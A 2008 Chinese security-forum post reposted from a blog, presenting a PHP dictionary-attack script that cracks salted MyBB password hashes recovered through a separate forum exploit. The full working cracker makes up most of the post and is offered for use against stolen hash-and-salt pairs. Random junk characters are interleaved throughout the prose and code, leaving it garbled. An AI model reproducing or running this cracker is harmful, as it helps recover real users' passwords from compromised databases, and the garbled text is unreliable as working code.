我爱电脑技术论坛 » 网络安全区 » MyBB Password Cracker v1.0

bbs23 发表于 2008-6-29 10:12

MyBB Password Cracker v1.0

文章来源：cool_wxd的博客
uG0U
cl~ 前两天和消失看的那个myBB论坛的exploit之后，破解出来的密码很变态~是经过md5(md5(salt).md(pass))这种形式的~
2vY2C"vbZ`x 一直没有进展~今天编写了一个小的利用程序~希望大家能用得上~
T)y.CLN&aE~9e pass.txt为密码字典~~一行一个~ec;Z)G'qRK
aLgr4` F){5\HC
另外，虽然程序中用了很垃圾的英文字符，但是程序绝对原创~Fl&BUf
C[(X*dW9W
[Copy to clipboard] [ - ]CODE:<?phpT)x+J1f8x1H%P&e;B
/*y%Dk*jWNO0~^
MyBB论坛程序密码暴力破解工具PHP版  By Cool_wXd[C.R.S.T]5W:vS$OG
本程序主要是针对MyBB论坛程序密码加密形式md5(md5(salt).md5(password))
hB+J8^)kP)@fZ9y 由于网络上针对MyBB的exploit程序只是破解出来数据库中的密码，而没有破解出来真正的密码*\)KL?]Q
也是由于最近遇到这样的问题，所以写出这么一个简单的小程序希望能够有所帮助！'u;R*k(it:LT:W
*/MX3\/}j0E+Gr
if ($argc<3)
e
VA2f HBn {
`Tv&z.PZ8f0{ C7m print "--------------------------------------------------------------\r\n";
p3h`8~\ print "          MyBB Password Cracker v1.0\r\n";
f6L
ug+D U$z1D print "--------------------------------------------------------------\r\n";
HL^[ H Fwtlz5U't print "Usage: mybb_password_cracker.php [md5_hash] [salt]\r\n";
g5BQm,U print "--------------------------------------------------------------\r\n"; QA3uX/I-J"zw K7Q7a
print "http://www.wolfexp.net & [url]http://hi.baidu.com/cool_wxd[/url]\r\n";Mz ~Xv g&i ?
print "          By Cool_wXd[C.R.S.T]\r\n";
)r)s:tZ l
O:[ print "--------------------------------------------------------------\r\n";
Du3VQc M$J,h die;3d~&@5J0dp3C
}0Sx~(cn#SY
function salt_password($password, $salt)a,lh L*^n-gL
{
M;S0M1]I Q$F return md5(md5($salt).md5($password));
l#X8yj(G{#Lx }
#^&h#^'f rh,c $md5_hash = $argv[1];
'[;M~Tm;p\V V/i $salt = $argv[2];g3d.o Q&H*e\M
$dict="pass.txt";//password dictionaryF
Ora)~+^ lS
if (strlen($md5_hash)!=32) {echo 'Error... The md5_hash must be 32 bits'; die;} H0?R4m {
Zpo!Y,c
if(!file_exists($dict)) {echo 'Can not find the password dictionary';die;} m~D%v?2S
$dict_pass=file($dict);  z,SvS4zX&{
$num=sizeof($dict_pass);  
7e)zp
u*L!x for($i=0;$i<$num;$i++)

Y`F%~^:H KOft {  t!za}\c-k-wu
$now_password=chop($dict_pass[$i]);
r1R;xUO.?N3BB if($md5_hash==salt_password($now_password,$salt)) {echo 'Success!('.$md5_hash.')is cracked and the true password is：('.$now_password.')';break;}}.bu {9g#^aQ'~
?>1D.ou%cm5J ~1L
另外，我们测试的那个论坛中我们注册账号的密码破解如图.PO:gA]t {ds
3x6_{{/Y;IK.y
[attach]34355[/attach]

查看完整版本: MyBB Password Cracker v1.0